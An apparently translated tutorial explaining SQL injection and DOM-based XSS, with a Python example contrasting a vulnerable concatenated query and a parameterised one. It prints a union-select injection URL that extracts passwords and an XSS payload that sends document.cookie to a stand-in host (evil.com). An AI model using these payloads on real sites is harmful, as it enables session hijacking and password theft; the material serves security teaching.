Data and commands of web Front-end hacker technology [SQL injection, xss cross-site scripting attack]

Source: Internet
Author: User

First, we know that when we open a website in a browser, the data shown to us comes from several places: it is stored on the server (database, memory, file system and so on), stored on the client (local cookies, Flash cookies), and transmitted between the two (JSON data, XML data and so on). If the data stream is contaminated during this exchange, storage and transmission no longer behave as expected, and security risks follow.

Storing, transmitting and presenting the data requires executing commands. Simply put, commands are the command lines to be executed, and each kind of command is interpreted and executed in its own environment. For example, the MySQL command select username, email, desc1 from users where id = 1 is interpreted by the database engine, which then produces the data for the query. When data content is injected into command content, and the injected part can be executed on its own during interpretation, an attack occurs.

SQL injection

Take the statement select username, email, desc1 from users where id = 1. The id value in this SQL statement is submitted by the user, who obtains the account information through an access link. When a user visits such a link, the back end executes the query above and returns the user data for the corresponding id to the front end. Under normal circumstances users submit an integer value for id, but an attacker can submit a link of the following form:

http://www.foo.com/user.php?id=1 union select password, 1, 1 from users

The SQL statement that results is:

select username, email, desc1 from users where id = 1 union select password, 1, 1 from users

XSS cross-site scripting

Consider this page script:

<script>eval(location.hash.substr(1));</script>

Here the built-in eval function dynamically executes JavaScript statements; location.hash returns the # and everything after it in the URL (for http://www.foo.com/info.html#callback it is "#callback"); and substr(1) cuts off the first character, leaving only the content after the #. An attacker can therefore build a link like this:

http://www.foo.com/info.html#new%20Image().src="http://www.evil.com/steal.php?c="+escape(document.cookie)

When the browser evaluates eval(location.hash.substr(1)), the call becomes:

eval('new Image().src="http://www.evil.com/steal.php?c="+escape(document.cookie)')

When the victim is tricked into visiting this link, the cookie session information is sent to the hacker's website. Generally the hacker can then use this cookie to log on to the victim's account and perform unauthorized operations.

[Supplement] Cross-site scripting attacks take place in the browser client, while SQL injection targets databases, which are generally on the server. However, HTML5 provides several client-side storage mechanisms, and on the browser side a SQLite database is used to store client data. These storage mechanisms are operated by JavaScript issuing SQL statements against the local database.
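The following added example (not part of the original article) shows the SQL injection case above in runnable form: the id is spliced into the query text in one function and bound as a validated parameter in the other, so the same union payload either extracts the password column or is rejected. It assumes an in-memory SQLite table with made-up rows in place of the article's MySQL users table.

```python
import sqlite3

# Constructed in-memory stand-in for the article's users table (MySQL in the
# text; SQLite here so the example runs offline). All values are made up.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table users (id integer primary key, username text, "
        "email text, desc1 text, password text)"
    )
    conn.executemany(
        "insert into users values (?, ?, ?, ?, ?)",
        [
            (1, "alice", "alice@example.com", "admin", "hash-of-alice-pw"),
            (2, "bob", "bob@example.com", "user", "hash-of-bob-pw"),
        ],
    )
    return conn


def vulnerable_lookup(conn, user_id):
    # Data is spliced into the command text, exactly like user.php?id=...:
    # the database engine cannot tell where the id ends and new SQL begins.
    sql = "select username, email, desc1 from users where id = " + user_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    # The id is checked to be an integer and bound as a parameter, so it
    # reaches the engine as data only, never as part of the command.
    try:
        id_value = int(user_id)
    except ValueError:
        return None  # reject anything that is not an integer id
    sql = "select username, email, desc1 from users where id = ?"
    return conn.execute(sql, (id_value,)).fetchall()


def compare(user_id):
    """Run both lookups against a fresh database and return their results."""
    conn = build_db()
    return vulnerable_lookup(conn, user_id), safe_lookup(conn, user_id)


if __name__ == "__main__":
    payload = "1 union select password, 1, 1 from users"
    print("vulnerable:", compare(payload)[0])
    print("safe:", compare(payload)[1])
```

With the normal input "1" both functions return the same single row; with the union payload the vulnerable query additionally returns one row per password hash, while the safe version returns None.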
